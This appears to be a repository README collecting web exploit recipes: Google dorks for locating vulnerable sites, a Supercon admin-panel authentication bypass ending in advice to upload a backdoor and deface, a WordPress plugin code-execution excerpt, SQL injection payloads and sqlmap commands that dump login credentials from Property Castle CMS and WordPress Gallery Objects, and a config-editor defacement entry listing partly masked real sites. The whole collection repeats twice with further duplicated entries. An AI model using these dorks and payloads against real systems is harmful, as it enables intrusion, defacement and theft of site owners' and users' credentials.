dreadpiratesr/Exploits

## Exploits
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.

Vulnerability Details
———————
First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer
Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php
After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php

And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) .

Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution

Google Dork : inurl:wp-content/plugins/better-wp-security
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
public function admin_tooltip_ajax() {

global $itsec_globals;

if ( ! isset( $_POST[&#039;nonce&#039;] ) || ! wp_verify_nonce(
sanitize_text_field( $_POST[&#039;nonce&#039;] ), &#039;itsec_tooltip_nonce&#039; ) ) {
die ();
}

if ( sanitize_text_field( $_POST[&#039;module&#039;] ) == &#039;close&#039; ) {

$data = $itsec_globals[&#039;data&#039;];
$data[&#039;tooltips_dismissed&#039;] = true;
update_site_option( &#039;itsec_data&#039;, $data );

} else {

call_user_func_array( $this->tooltip_modules[ sanitize_text_field(
$_POST[&#039;module&#039;] ) ][&#039;callback&#039;], array() );

}

die(); // this is required to return a proper result

}

Exploit Title: Property Castle CMS post SQL injection

Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php

 Exploit Title: Property Castle CMS post SQL injection
 Google Dork: inurl:“/cms/cms.php?link_id=”
 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php

Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php

Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
Dork Google: inurl:/admin-ajax.php?action=go_view_object
######################


Poc via Browser:

http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---


#####################

Polish CMS - SQL Injection
{-} Vulnerable Versions => All Versions So Far.

{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
——————————————————————————————————————————–

File:
index.php {HomePage}

Vulnerable Parameters:
[id] , [j] , [s] , [lang]

Administration Panel:
/admin/

Exploit Title: PRIVATE CSR
Google Dork : inurl:/“config/config.izo”
# Priv8 SCR Editors
#
#######################################################
# Use Editors To Edit Config Files And Deafce The Site Via CSR Editors.
#######################################################
#
# [+] Example:
#http://lom-radioX.com/config/config.izo
#http://kesbangpolbuXlukumba.info/config/config.izo
#http://www.mirgosXtinits.ru/config/config.izo
#http://sacredodysXsey.com/config/config.izo
#http://www.biohXgienica.com/config/config.izo
#######################################################
# [+] Deface Page: www.site.com/config/tar.tmp
#######################################################
	Exploit Title: Supercon Direct login to admin panel without entering password
	Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
	Product Description
	——————-
	Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
	We provide world-class technology services by constantly exploring and implementing innovative
	solutions that drive long-term value to our customers. We have been providing solutions to clients
	across the globe for more than 5 years and boast of our extensive
	experience on website designing and development projects.

	Vulnerability Details
	———————
	First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
	Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer
	Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php
	After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php

	And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) .

	Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution

	Google Dork : inurl:wp-content/plugins/better-wp-security
	Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
	Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
	public function admin_tooltip_ajax() {

	global $itsec_globals;

	if ( ! isset( $_POST['nonce'] ) \|\| ! wp_verify_nonce(
	sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
	die ();
	}

	if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {

	$data = $itsec_globals['data'];
	$data['tooltips_dismissed'] = true;
	update_site_option( 'itsec_data', $data );

	} else {

	call_user_func_array( $this->tooltip_modules[ sanitize_text_field(
	$_POST['module'] ) ]['callback'], array() );

	}

	die(); // this is required to return a proper result

	}

	Exploit Title: Property Castle CMS post SQL injection

	Google Dork: inurl:“/cms/cms.php?link_id=”
	1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/!50000concat/(0x3a3a,database()),null)–+
	we will have database name
	2- we search “contact us” page
	3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
	4- we use sqlmap tool now and inject it with POST method
	EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
	#admin page: http://website/admin/index.php

	Exploit Title: Property Castle CMS post SQL injection
	Google Dork: inurl:“/cms/cms.php?link_id=”
	1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/!50000concat/(0x3a3a,database()),null)–+
	we will have database name
	2- we search “contact us” page
	3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
	4- we use sqlmap tool now and inject it with POST method
	EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
	#admin page: http://website/admin/index.php

	Exploit Title: Property Castle CMS post SQL injection
	Google Dork: inurl:“/cms/cms.php?link_id=”
	1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/!50000concat/(0x3a3a,database()),null)–+
	we will have database name
	2- we search “contact us” page
	3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
	4- we use sqlmap tool now and inject it with POST method
	EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
	#admin page: http://website/admin/index.php

	Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
	Dork Google: inurl:/admin-ajax.php?action=go_view_object
	######################


	Poc via Browser:

	http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


	sqlmap:

	sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

	---
	Place: GET
	Parameter: viewid
	Type: boolean-based blind
	Title: AND boolean-based blind - WHERE or HAVING clause
	Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
	---


	#####################

	Polish CMS - SQL Injection
	{-} Vulnerable Versions => All Versions So Far.

	{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
	{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
	——————————————————————————————————————————–

	File:
	index.php {HomePage}

	Vulnerable Parameters:
	[id] , [j] , [s] , [lang]

	Administration Panel:
	/admin/

	Exploit Title: PRIVATE CSR
	Google Dork : inurl:/“config/config.izo”
	# Priv8 SCR Editors
	#
	#######################################################
	# Use Editors To Edit Config Files And Deafce The Site Via CSR Editors.
	#######################################################
	#
	# [+] Example:
	#http://lom-radioX.com/config/config.izo
	#http://kesbangpolbuXlukumba.info/config/config.izo
	#http://www.mirgosXtinits.ru/config/config.izo
	#http://sacredodysXsey.com/config/config.izo
	#http://www.biohXgienica.com/config/config.izo
	#######################################################
	# [+] Deface Page: www.site.com/config/tar.tmp
	#######################################################